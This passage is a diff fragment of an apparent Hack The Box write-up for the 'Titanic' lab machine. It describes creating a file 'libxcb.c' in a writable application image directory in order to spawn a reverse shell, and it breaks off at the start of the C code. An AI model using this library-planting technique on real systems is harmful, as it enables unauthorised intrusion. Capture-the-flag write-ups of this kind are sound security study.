Loc000Nguyen000/HTB_WriteUp/Machine_Labs/Titanic/Titanic.md

 ```

 + We can manipulate the path `/opt/app/static/assets/images` to spawn the reverse shell.
-+ Firstly, we access `/opt/app/static/assets/images` and create the file libxcb.c
++ Firstly, we access `/opt/app/static/assets/images` and create the file `libxcb.c`:

 ```C
 #include <stdio.h>